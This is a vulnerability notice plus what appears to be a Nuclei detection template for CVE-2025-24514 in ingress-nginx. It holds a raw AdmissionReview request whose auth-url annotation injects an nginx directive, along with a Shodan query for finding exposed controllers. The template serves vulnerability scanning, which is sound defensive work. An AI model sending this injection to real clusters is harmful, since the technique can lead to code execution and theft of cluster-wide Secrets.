A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
PoC代码[已公开]
id: CVE-2025-24514
info:
name: Ingress-Nginx Controller - Configuration Injection via Unsanitized `auth-url` Annotation
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
reference:
- https://github.com/kubernetes/kubernetes/issues/131006
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- https://nvd.nist.gov/vuln/detail/CVE-2025-24514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-24514
cwe-id: CWE-20
epss-score: 0.33933
epss-percentile: 0.96836
metadata:
verified: true
max-request: 1
shodan-query: ssl:"ingress-nginx" port:8443
tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",
"kind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"resource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"requestKind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"requestResource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"name": "test-{{randstr}}",
"namespace": "default",
"operation": "CREATE",
"userInfo": {
},
"object": {
"kind": "Ingress",
"apiVersion": "networking.k8s.io/v1",
"metadata": {
"name": "test-{{randstr}}",
"namespace": "default",
"creationTimestamp": null,
"annotations": {
"nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"
}
},
"spec": {
"ingressClassName": "nginx",
"rules": [
{
"host": "{{randstr}}",
"http": {
"paths": [
]
}
}
]
},
"status": {
"loadBalancer": {}
}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
matchers:
- type: word
part: body
words:
- 'AdmissionReview'
- 'directive is not allowed here'
- 'load_module'
condition: and
# digest: 4a0a00473045022100ca6e3fb5d65f9687b7d8868e697c59d6cc8b3dbdb6e10b433180dab3c377d38d02206c797e5bce19550f0bda89d7bffd6d37072a6cb72f1759642f9db51ed9de107e:922c64590222798bb761d5b6d8e72950